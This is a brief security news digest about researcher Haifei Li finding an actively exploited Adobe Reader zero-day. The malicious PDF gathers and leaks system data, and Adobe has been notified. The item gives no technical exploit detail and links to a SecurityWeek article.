Researcher Haifei Li detected an actively exploited zero-day in Adobe Reader using his Expmon sandbox, identifying a malicious PDF that collects and exfiltrates system data and may enable sandbox escape and remote code execution. The exploit works against the latest Reader build, samples were submitted to Expmon and VirusTotal, and Adobe was notified as the investigation continues. #AdobeReader #Expmon #VirusTotal #HaifeiLi
Keypoints
- A zero-day Adobe Reader exploit was detected by Haifei Li using the Expmon sandbox.
- The malicious PDF collects and leaks various system and user data and may precede RCE and sandbox escape attempts.
- The exploit is effective against the latest Adobe Reader version and samples were uploaded to Expmon and VirusTotal.
- One VirusTotal sample dates to November 2025, suggesting the vulnerability has been exploited for months.
- Li could not reproduce the full attack chain or additional payloads, and Adobe has been notified for assessment.
Read More: https://www.securityweek.com/adobe-reader-zero-day-exploited-for-months-researcher/